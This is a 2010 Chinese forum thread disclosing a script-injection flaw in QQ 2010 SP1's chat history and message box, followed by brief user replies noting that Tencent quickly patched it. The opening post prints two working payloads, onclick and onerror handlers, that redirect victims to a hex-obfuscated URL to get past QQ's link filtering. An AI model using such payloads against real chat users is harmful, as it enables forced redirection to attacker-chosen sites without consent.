切换到宽版
  • 4185阅读
  • 9回复

[QQ新闻]QQ腾讯2010SP1发布即现严重漏洞 [复制链接]

上一主题 下一主题
离线lovesxy521
 

只看楼主 倒序阅读 使用道具 楼主  发表于: 2010-07-29
腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010Sp1竟然有如此大漏洞。
##脚本出错还会提示


1、消息记录的Javascript、Html标签没有屏蔽

2、消息盒子Javascript、Html标签没有屏蔽

3、小实验
发送代码:<input onclick="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’" />
因为腾讯会自动将url转换,我们必须混淆url才能发送



4、超牛代码
<img src=’tetet’ onerror="window.location=’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x6f\x77\x6f\x73\x2e\x63\x6f\x6d’"/>
因为要点击才能触发,想到一个不用点击就能触发的代码。
5、希望腾讯快点修复,这个漏洞非同小可
6、本漏洞由TGL发现。

注意,本代码仅供研究之用,请勿用于违法事情。

腾讯的危机应急能力很高。在14:56:32秒已经打包新版本并在首页提供下载。一个小风波就在几个小时静悄悄的来,静悄悄的走了。
希望腾讯以后也不要犯低级错误咯,如果还发现有Bug,可以重新下载QQ2010 SP1。
MsgMgr.dll是元凶,已经在14:02:54秒重新签名,漏洞提交给腾讯为早上9点。
丢掉了我这所珍惜的一切,该怪谁?
冬去,春来,然而你却不属于我..
离线linzongyi

只看该作者 1楼 发表于: 2010-07-29
晕~又更新了呀!
再好的东西,都有失去的一天。再深的记忆,也有淡
忘的一天。再美的梦,也有苏醒的一天。该放弃的决
不挽留.

飘云社区新手请进,发贴回贴必看
离线cnqihc

只看该作者 2楼 发表于: 2010-07-29
漏洞严重
离线jyz0424

只看该作者 3楼 发表于: 2010-07-29
学习了   
离线379475446
只看该作者 4楼 发表于: 2010-07-29
当小白鼠就要做好被消灭的准备。
离线xiaochouyu

只看该作者 5楼 发表于: 2010-07-29
在IM看过了
离线沉浮大哥

只看该作者 6楼 发表于: 2010-07-29
腾讯已经修正了
离线zhwy

只看该作者 7楼 发表于: 2010-07-29
引用第6楼沉浮大哥于2010-07-29 11:43发表的 :
腾讯已经修正了 

已经悄悄更新了


 
离线snyquen

只看该作者 8楼 发表于: 2010-07-30
赖人还用着2009 一般都是等到提示不能用了才升级
离线hack7755

只看该作者 9楼 发表于: 2010-09-17
用户被禁言,该主题自动屏蔽!
快速回复
限100 字节
批量上传需要先选择文件,再选择上传
 
上一个 下一个